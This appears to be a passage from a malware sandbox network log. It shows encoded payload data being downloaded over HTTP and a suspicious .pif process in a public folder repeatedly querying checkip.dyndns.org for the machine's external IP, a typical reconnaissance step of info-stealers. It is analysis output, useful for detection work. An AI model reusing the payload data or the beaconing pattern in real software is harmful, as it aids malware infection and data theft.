Jan 6, 2025 07:57:57.752257109 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:57:57 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Sun, 05 Jan 2025 22:51:37 GMT ETag: "2ca99af-bf3d0-62afd5ac0f2a3" Accept-Ranges: bytes Content-Length: 783312 Vary: Accept-Encoding Keep-Alive: timeout=5 Data Raw: 37 6b 4a 35 67 6a 48 77 71 47 59 5a 50 67 6e 54 43 58 5a 43 38 4f 64 59 38 69 64 75 79 67 6e 52 54 76 63 64 67 64 67 49 43 37 6c 43 47 2f 6d 53 75 2f 71 37 4c 52 30 6b 4a 4a 43 7a 42 61 34 77 46 65 2b 6b 73 76 79 36 51 52 45 6d 4a 70 75 38 2b 61 67 74 4a 65 71 74 6d 46 65 56 43 45 4e 68 72 36 52 4f 70 42 30 33 59 72 75 4d 55 6f 34 67 4b 30 36 75 69 31 32 51 48 6a 4e 59 71 61 5a 59 6b 2f 56 49 51 2b 52 34 52 6f 62 73 56 43 76 6c 63 44 52 38 36 6c 49 33 31 6d 68 42 62 66 64 4e 79 54 55 59 56 48 75 68 78 6b 72 42 55 59 68 5a 34 6f 4b 52 38 32 65 4c 57 44 59 58 41 51 78 67 42 4d 50 48 79 49 41 45 54 32 77 72 72 64 52 30 42 31 4f 42 4f 37 4b 39 35 44 35 65 66 54 44 69 62 5a 49 77 54 33 39 36 4f 64 35 35 64 4b 45 36 46 64 6c 52 71 4b 57 6a 38 45 76 4b 58 36 6d 58 6b 31 51 46 66 45 43 7a 34 4e 67 31 2f 62 41 46 78 74 48 4a 51 51 4b 30 41 64 62 58 70 34 46 55 49 64 6e 30 65 4f 5a 31 54 68 48 67 43 34 2b 72 6d 43 51 6b 58 4f 58 31 61 4b 2f 4e 4b 31 37 6d 2b 34 54 48 74 62 5a 43 59 34 6c 57 6d 4d 6d 38 4c 68 [TRUNCATED] Data Ascii: 7kJ5gjHwqGYZPgnTCXZC8OdY8iduygnRTvcdgdgIC7lCG/mSu/q7LR0kJJCzBa4wFe+ksvy6QREmJpu8+agtJeqtmFeVCENhr6ROpB03YruMUo4gK06ui12QHjNYqaZYk/VIQ+R4RobsVCvlcDR86lI31mhBbfdNyTUYVHuhxkrBUYhZ4oKR82eLWDYXAQxgBMPHyIAET2wrrdR0B1OBO7K95D5efTDibZIwT396Od55dKE6FdlRqKWj8EvKX6mXk1QFfECz4Ng1/bAFxtHJQQK0AdbXp4FUIdn0eOZ1ThHgC4+rmCQkXOX1aK/NK17m+4THtbZCY4lWmMm8Lh3dSKTlFZ67/331TvVxywG0OWYHbOf8wD5SQtXCEdEoIuzWxA67Xe8UxZtk3y8gIW/JW8sqDA+EzliSDyQk96HVIeEZ7/7AeS1vOSX11YpfXoQBZvLYnklo/VfupaxBnBpTNN3FMIMCLlax5SYkyxpWOKiYTeIdWzc2rItO0E8BXNOCZZ0j9HT0VoREt+WvZ0ekSsabmoNiMKNlvJ+HZ/OpMOWHchRA506tnIj6V84gpW54IVGTYqCHgRxaj16bv8v4M2ppTtDRamUj0/+B4IUSOq8NmtrZxEw319Ahp9rEVCt4QGnIyb06J9RInN++LyYkzFvnftlZ/OcelWjIW+zTIJN4iQYXt+A+JiQl+s61EuArEfDWhSysUv/yjLAurEvw9ZGtR3oEDgeN2R/ZH/Drld0n0x5FXISs8cpX+FqGq/PeY/tmtI8imSdVN9/HMZsIU0bdr/G6+zVKynwxxuoxTdVyNLQ5EUHNfVmbJf9Kz4FgihDrFm+nMmsORWNyoD11ED1VddIMmNVtbQo1ui3McYULPagkJH6ZlJbwR2hBaNALai3LHoGtv2fz32TZCu2Kx5dk2sPepb2WBIrXzSsH5uu
Jan 6, 2025 07:57:57.752273083 CET	224	IN	Data Raw: 64 74 4b 58 30 49 4e 66 44 47 4e 32 54 2b 6a 65 6e 4b 64 6c 71 77 50 64 4a 64 44 54 65 6e 5a 41 6c 52 36 76 75 78 5a 64 33 48 70 42 6b 36 57 79 6b 61 52 78 53 69 31 50 46 77 6e 41 76 32 79 76 59 4f 49 68 71 65 67 4d 2b 67 30 58 49 70 59 6f 46 55 Data Ascii: dtKX0INfDGN2T+jenKdlqwPdJdDTenZAlR6vuxZd3HpBk6WykaRxSi1PFwnAv2yvYOIhqegM+g0XIpYoFUIlb0HuN6l0phSViOqV4M3gsCgKWrS23OiYk9cS3S3oYQy+3cht9JiQpPbJ8VZgQQ2GqoGeUJCaTas/nQ90UUSvXo2V57O9LTObKKXBJ+PmQ2yXdKwzqi7j7xUIZAT0JGW3xXEPmaTXj+PI
Jan 6, 2025 07:57:57.752285004 CET	1236	IN	Data Raw: 66 64 63 4d 41 32 79 72 33 49 47 76 6c 45 64 5a 50 42 78 52 73 38 36 33 48 4f 42 50 2f 6f 72 76 74 75 67 30 73 37 36 4f 78 36 72 49 4f 69 4f 56 44 44 4c 55 49 6e 2b 56 39 4e 76 7a 62 48 61 53 38 78 43 31 5a 33 44 57 51 6b 62 76 47 50 66 2b 77 42 Data Ascii: fdcMA2yr3IGvlEdZPBxRs863HOBP/orvtug0s76Ox6rIOiOVDDLUIn+V9NvzbHaS8xC1Z3DWQkbvGPf+wBHDWx0gO1iJAE6nzTq7tc9eIPv3C7YyryTEl4xhsba/PpsOp8tmAphRHyGXj3paJGl2YKGinfB45eC0lO8H3XXBOrnCkPiuDVMDBno8TTIsQzYeOBYZAHLZ+bQBVfFHBfJFBS4hJ5BryscMraeJ99ZesRLsJUVjYpS
Jan 6, 2025 07:57:57.752290964 CET	1236	IN	Data Raw: 34 73 4c 47 6e 6c 41 39 54 6b 53 6e 67 6a 78 37 6b 76 2f 61 52 4f 6c 51 39 38 6d 4f 51 53 30 56 42 5a 61 6d 68 59 49 59 59 4d 55 53 7a 6d 46 4a 2b 4b 52 6f 75 35 55 69 57 33 76 78 67 4f 4e 65 66 55 58 54 73 54 54 65 36 31 52 71 51 4a 43 59 70 55 Data Ascii: 4sLGnlA9TkSngjx7kv/aROlQ98mOQS0VBZamhYIYYMUSzmFJ+KRou5UiW3vxgONefUXTsTTe61RqQJCYpUAksdzRI+Bhty02E8TsYnoRmZ8fvYGPzi4JGbSYmDDmUcDy9LkhB0b4AqvtMR410GJdgM/SWoxBsZulChM8FtTkO7JiwZI8ZDWeC3QvgYesLaEN5OXeTdmMJ1yQmf7/PZ/OFNIqNuVT4rfGG9g9t5mpc3HemLwWzZe
Jan 6, 2025 07:57:57.752304077 CET	1236	IN	Data Raw: 6a 4b 52 66 49 48 6d 32 31 30 55 38 52 31 42 68 33 6f 72 68 52 34 79 66 6b 58 4b 48 6d 53 52 69 44 41 48 6a 68 77 45 74 62 6a 52 6c 39 66 67 6a 2b 42 67 61 2f 42 34 44 4d 35 43 6e 74 6e 55 36 69 73 74 64 45 72 65 39 61 64 71 43 68 4a 43 5a 61 6c Data Ascii: jKRfIHm210U8R1Bh3orhR4yfkXKHmSRiDAHjhwEtbjRl9fgj+Bga/B4DM5CntnU6istdEre9adqChJCZalknNf4MZLZRbsG6fHlyz+ruQcREofqUM5b0WSJ1Et4WPDgt9Qdl/oC4xbWOoop4VM30tcIqSFQ17VLaEW+KJOpoF+F6/kVyf9VRUmmosiBtZXL9vTMAmJmA83oM2phSZdW3ZJiSeIi9Ts5FjoqqJDdp2KHn8RTLaiy
Jan 6, 2025 07:57:57.752315998 CET	672	IN	Data Raw: 54 75 34 6b 32 64 79 63 4d 4d 39 35 70 58 6a 69 32 2f 7a 4f 43 63 52 65 42 36 54 77 66 35 48 5a 49 79 66 30 33 4b 64 69 48 4e 49 77 42 53 78 58 4b 6b 44 57 6a 42 69 34 5a 33 64 41 4c 34 47 52 54 49 33 7a 5a 45 4d 67 76 2b 75 31 73 6a 77 76 62 53 Data Ascii: Tu4k2dycMM95pXji2/zOCcReB6Twf5HZIyf03KdiHNIwBSxXKkDWjBi4Z3dAL4GRTI3zZEMgv+u1sjwvbS/UL3rcFIpRmLHrNC9kiJfCXtxDMLxn2nZP0eEIoFJ3i7M07LmSwoU+XFApKLhziHp/T0GcV3g+QsK5mZdMjdLGqQBW6RYTWDXQr20JwhYTHSBSWBWu4plckJrkmJnzZ3WL8iPSdyNFXCrBPbN6q+/ucU+WApiBn3d
Jan 6, 2025 07:57:57.752326965 CET	1236	IN	Data Raw: 54 34 30 68 41 54 67 43 46 53 67 42 34 6d 61 66 54 57 35 76 47 57 7a 56 57 56 35 46 72 44 30 4e 38 31 37 47 62 64 6e 38 37 47 54 68 59 6e 68 55 67 6d 57 6d 58 71 72 68 78 76 43 73 74 4b 2f 71 56 4f 68 69 48 35 63 2b 51 38 65 64 76 47 68 49 4b 41 Data Ascii: T40hATgCFSgB4mafTW5vGWzVWV5FrD0N817Gbdn87GThYnhUgmWmXqrhxvCstK/qVOhiH5c+Q8edvGhIKAcHmM9PR343/ynkQHh1MsxI/yuZ8lQTCa+wEBlzjO174rex2LrBnBgzzMuAfTIu2q3waw4r4AtyX8uN+HAn1Z9wTddbB0Z7txXFYGxFg4A4x2MvOhvHJkfHpRCgf6aK2lbg5F5KNT+lIR3/v7raWsdMcAmhpw/FjHn
Jan 6, 2025 07:57:57.752343893 CET	224	IN	Data Raw: 61 31 35 58 47 47 43 59 6d 34 5a 38 4c 54 4c 5a 64 65 58 47 49 54 6c 7a 62 6f 50 32 5a 6c 68 61 68 4d 4d 6a 31 50 34 33 79 63 62 67 33 74 54 55 67 76 6c 59 59 56 41 72 55 4b 51 6b 71 6d 38 65 65 6a 49 76 47 6b 48 4b 32 36 6d 76 31 6f 50 43 30 67 Data Ascii: a15XGGCYm4Z8LTLZdeXGITlzboP2ZlhahMMj1P43ycbg3tTUgvlYYVArUKQkqm8eejIvGkHK26mv1oPC0gx/0S+KkNA9UR3W3kZRP6h5F7vpA7LiWECVAQRGM7CYktF2r973c5r9BFFzuacRoWGbbmPS1a6rtY9XkEsUoFmTufLGL6RzXQtNTyCMSz5K2IwtH1nIYbqx6QOpUI2k+MED62U4P8DaCazu
Jan 6, 2025 07:57:57.752352953 CET	1236	IN	Data Raw: 31 57 78 58 65 49 4d 36 76 53 2f 46 77 72 52 69 39 2b 43 59 6d 54 30 37 47 73 45 44 73 4d 61 39 71 42 62 4d 70 52 2f 6b 46 59 6d 73 39 68 6d 32 36 44 6a 54 5a 74 6d 73 48 52 2f 39 69 56 71 37 37 6c 4f 77 38 4f 61 5a 38 56 4e 4e 4d 77 70 4e 2f 39 Data Ascii: 1WxXeIM6vS/FwrRi9+CYmT07GsEDsMa9qBbMpR/kFYms9hm26DjTZtmsHR/9iVq77lOw8OaZ8VNNMwpN/9FyS7mdhbDZMP28q1aRR8w7zBjXxWUXUNFBZlDbWNJ10hiCgh0v3A+paErYdSWiFVsQnPghWuGYNnvOfpYWR/oFHguwl39ooZQ6PycQn/NvclhvZG9Vz7fuUcNOP8Q0kJop5XUsIRYEtkNY+jOeDlSgM0de6eeS8Gc
Jan 6, 2025 07:57:57.752365112 CET	1236	IN	Data Raw: 48 62 42 43 44 54 39 49 43 7a 47 57 36 50 34 34 37 74 4f 59 50 77 55 70 66 47 65 2f 30 4a 69 52 7a 31 32 70 76 71 70 52 5a 4f 45 70 2b 4c 68 4d 2b 46 72 57 34 67 74 77 6f 2f 78 53 66 6c 35 38 58 78 4e 36 30 64 61 42 39 7a 46 50 79 76 48 4e 56 6f Data Ascii: HbBCDT9ICzGW6P447tOYPwUpfGe/0JiRz12pvqpRZOEp+LhM+FrW4gtwo/xSfl58XxN60daB9zFPyvHNVoK+Qq/IbAAb6Aog4LA8Qh+9023HMwu3GujTpngWS94J3ny9+ZmWkmfkjdxAXD9BY8w2uEJLSglbFxwPRagQW7+25oIDSsMfqAEtMuwO7jRKoeKb6i3Zck78PvpOvLS78xdImJqqvw92jRgh+Zn1MVPJ1kyh74QqT6t
Jan 6, 2025 07:57:57.757352114 CET	1236	IN	Data Raw: 59 76 38 6b 2f 43 66 6c 79 67 44 58 59 67 51 5a 32 4a 69 51 69 4d 34 54 47 5a 6c 41 73 71 57 74 52 30 6f 42 7a 39 54 7a 39 6f 61 50 7a 30 77 67 33 6f 69 77 54 56 70 2f 48 71 56 32 73 49 6e 67 48 52 59 78 4e 62 56 43 5a 47 70 77 52 46 6a 55 30 65 Data Ascii: Yv8k/CflygDXYgQZ2JiQiM4TGZlAsqWtR0oBz9Tz9oaPz0wg3oiwTVp/HqV2sIngHRYxNbVCZGpwRFjU0eznl0elggNcLaSMCLpoAI9XmsuYCQM5fhYTrKqlVsf/YC+Ro6mA62dWAlU8gpYkLdlL9uXbOlQhLuduz7n8OOvJZXRmHhs21c078XmVx7UsYbdDhJ+CMLdLS5D35OcXO9EvzCtf07q2ZzYeAoduzTd5T6WkHU5VrJC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	132.226.247.73	80	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:02.796468019 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:03.498809099 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:58:03.506364107 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:03.720361948 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:58:05.057239056 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:05.271744013 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	132.226.247.73	80	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:05.902997971 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:06.603653908 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	132.226.247.73	80	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:07.215384960 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:07.905874968 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	132.226.247.73	80	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:08.550697088 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:09.223630905 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	132.226.247.73	80	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:09.834676027 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:10.527867079 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	132.226.247.73	80	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:11.273552895 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:11.966157913 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:11 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	132.226.247.73	80	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:12.955374002 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:13.625932932 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	132.226.247.73	80	340	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:14.270870924 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:14.948498964 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	132.226.247.73	80	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:15.690438986 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 6, 2025 07:58:16.389931917 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:58:16.394079924 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:16.607877016 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:58:17.638225079 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:17.851861954 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49760	132.226.247.73	80	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 07:58:18.651109934 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 6, 2025 07:58:19.345253944 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49763	132.226.247.73	80	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
